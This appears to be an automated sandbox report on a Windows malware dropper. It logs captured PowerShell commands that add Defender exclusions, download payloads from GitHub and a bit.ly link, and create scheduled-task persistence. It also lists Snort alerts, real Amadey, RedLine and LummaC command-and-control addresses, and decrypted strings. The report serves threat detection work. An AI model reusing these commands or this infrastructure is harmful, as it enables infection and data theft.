Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe, ParentProcessId: 7576, ParentProcessName: FirstZ.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7604, ProcessName: powercfg.exe

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe, ParentProcessId: 7576, ParentProcessName: FirstZ.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7592, ProcessName: powershell.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\user\AppData\Local\Corporation.zip'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\user\AppData\Local\Corporation.zip'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2472, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\user\AppData\Local\Corporation.zip'", ProcessId: 5044, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden", CommandLine: powershell -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2472, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden", ProcessId: 7820, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe, ProcessId: 6208, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2472, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", ProcessId: 6152, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 , CommandLine: schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\install.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7296, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 , ProcessId: 4836, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2472, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", ProcessId: 6152, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2472, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", ProcessId: 6152, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 5952, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Powershell downloading file from url shortener site

Source: Process started

Author: Joe Security: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2472, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", ProcessId: 6152, ProcessName: powershell.exe

Snort Signatures

ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.5 - Destination IP: 77.91.77.81

Timestamp:	06/24/24-00:10:04.426450
SID:	2019714
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 77.91.77.81

Timestamp:	06/24/24-00:10:08.289482
SID:	2044696
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Activity M3 - Source IP: 192.168.2.5 - Destination IP: 77.91.77.81

Timestamp:	06/24/24-00:10:03.476370
SID:	2856147
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 77.91.77.81

Timestamp:	06/24/24-00:10:17.400356
SID:	2044696
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 185.215.113.67 - Destination IP: 192.168.2.5

Timestamp:	06/24/24-00:10:13.480564
SID:	2046056
Source Port:	40960
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 77.91.77.81

Timestamp:	06/24/24-00:10:05.817243
SID:	2044696
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 77.91.77.81

Timestamp:	06/24/24-00:10:10.284371
SID:	2044696
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Response M1 - Source IP: 185.172.128.116 - Destination IP: 192.168.2.5

Timestamp:	06/24/24-00:10:16.715747
SID:	2856122
Source Port:	80
Destination Port:	49718
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 77.91.77.81

Timestamp:	06/24/24-00:10:19.956617
SID:	2044696
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 77.91.77.81

Timestamp:	06/24/24-00:10:13.805957
SID:	2044696
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 185.215.113.67 - Destination IP: 192.168.2.5

Timestamp:	06/24/24-00:10:08.077476
SID:	2043234
Source Port:	40960
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Amadey CnC Response M1 - Source IP: 77.91.77.81 - Destination IP: 192.168.2.5

Timestamp:	06/24/24-00:10:04.421395
SID:	2856122
Source Port:	80
Destination Port:	49705
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.67

Timestamp:	06/24/24-00:10:22.812769
SID:	2043231
Source Port:	49707
Destination Port:	40960
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.5 - Destination IP: 185.215.113.67

Timestamp:	06/24/24-00:10:07.787070
SID:	2046045
Source Port:	49707
Destination Port:	40960
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hsRju5CPK2.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://77.91.77.81/Kiru9gu/index.phpY	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phpfG1	Avira URL Cloud: Label: phishing
Source: https://disappointcredisotw.shop/api	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/Kiru9gu/index.php	Avira URL Cloud: Label: phishing
Source: barebrilliancedkoso.shop	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/Kiru9gu/index.phpc	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phpld	Avira URL Cloud: Label: phishing
Source: http://185.172.128.116/FirstZ.exe	Avira URL Cloud: Label: malware
Source: http://185.172.128.116/Mb3GvQs8/index.php6r	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phps	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phpt	Avira URL Cloud: Label: phishing
Source: http://185.172.128.116/Mb3GvQs8/index.php1mb3JtLXVybGVuY29kZWQ=x	Avira URL Cloud: Label: phishing
Source: http://185.172.128.116/Mb3GvQs8/index.phpQs8/index.php	Avira URL Cloud: Label: phishing
Source: https://iplogger.co/favicon.ico	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/Kiru9gu/index.phptch	Avira URL Cloud: Label: phishing
Source: http://185.172.128.116/Mb3GvQs8/index.php6/	Avira URL Cloud: Label: phishing
Source: http://185.172.128.116/Mb3GvQs8/index.phpncoded:	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/lend/legs.exeZ	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/lend/ama.exew	Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/Kiru9gu/index.phpgd	Avira URL Cloud: Label: phishing
Source: https://iplogger.co/1lLubL	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\6.exe	Avira: detection malicious, Label: HEUR/AGEN.1313486
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\8.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lummac2[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 5.2.gold.exe.9e0000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": "4.185.27.237:13528", "Bot Id": "LiveTraffic", "Message": "Error disable antivirus and try again", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
Source: 9.0.NewLatest.exe.d0000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "185.172.128.116/Mb3GvQs8/index.php", "Version": "4.30"}
Source: lummac2.exe.5064.8.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["barebrilliancedkoso.shop", "parallelmercywksoffw.shop", "ohfantasyproclaiwlo.shop", "landdumpycolorwskfw.shop", "flourhishdiscovrw.shop", "conferencefreckewl.shop", "notoriousdcellkw.shop", "liabiliytshareodlkv.shop", "liabiliytshareodlkv.shop", "barebrilliancedkoso.shop", "parallelmercywksoffw.shop", "ohfantasyproclaiwlo.shop", "landdumpycolorwskfw.shop", "flourhishdiscovrw.shop", "conferencefreckewl.shop", "notoriousdcellkw.shop", "liabiliytshareodlkv.shop", "liabiliytshareodlkv.shop", "barebrilliancedkoso.shop", "parallelmercywksoffw.shop", "ohfantasyproclaiwlo.shop", "landdumpycolorwskfw.shop", "flourhishdiscovrw.shop", "conferencefreckewl.shop", "notoriousdcellkw.shop", "liabiliytshareodlkv.shop", "liabiliytshareodlkv.shop"], "Build id": "LGNDR1--"}

Multi AV Scanner detection for domain / URL

Source: conferencefreckewl.shop	Virustotal: Detection: 11%	Perma Link
Source: http://77.91.77.81/Kiru9gu/index.phpY	Virustotal: Detection: 14%	Perma Link
Source: notoriousdcellkw.shop	Virustotal: Detection: 11%	Perma Link
Source: https://disappointcredisotw.shop/api	Virustotal: Detection: 15%	Perma Link
Source: http://77.91.77.81/Kiru9gu/index.php	Virustotal: Detection: 23%	Perma Link
Source: http://77.91.77.81/Kiru9gu/index.phpc	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.116/FirstZ.exe	Virustotal: Detection: 17%	Perma Link
Source: barebrilliancedkoso.shop	Virustotal: Detection: 14%	Perma Link
Source: http://185.172.128.116/Mb3GvQs8/index.php6r	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\wikombernizc\reakuqnanrkn.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\FirstZ[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lummac2[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\taskweaker[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\legs[1].exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\NewLatest[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Installer[1].exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\6.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: hsRju5CPK2.exe	Virustotal: Detection: 55%			Perma Link
Source: hsRju5CPK2.exe	ReversingLabs: Detection: 45%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lummac2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000014001\1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\taskweaker[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\legs[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\NewLatest[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: hsRju5CPK2.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: 185.172.128.116
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: /Mb3GvQs8/index.php
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: S-%lu-
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: b66a8ae076
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Hkbsse.exe
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Startup
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: rundll32
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Programs
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: %USERPROFILE%
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: http://
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: https://
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: /Plugins/
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: &unit=
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: shell32.dll
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: kernel32.dll
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: GetNativeSystemInfo
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: ProgramData\
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: AVAST Software
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Kaspersky Lab
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Panda Security
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Doctor Web
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: 360TotalSecurity
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Bitdefender
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Norton
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Sophos
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Comodo
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: WinDefender
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: 0123456789
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: ------
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: ?scr=1
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: ComputerName
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: -unicode-
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: VideoID
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: DefaultSettings.XResolution
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: DefaultSettings.YResolution
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: ProductName
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: CurrentBuild
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: rundll32.exe
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: "taskkill /f /im "
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: " && timeout 1 && del
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: && Exit"
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: " && ren
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: Powershell.exe
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: shutdown -s -t 0
Source: 9.0.NewLatest.exe.d0000.0.unpack	String decryptor: random

Source: hsRju5CPK2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:52897 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 58.65.168.132:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.67.42.145:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.31.196.208:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49766 version: TLS 1.2
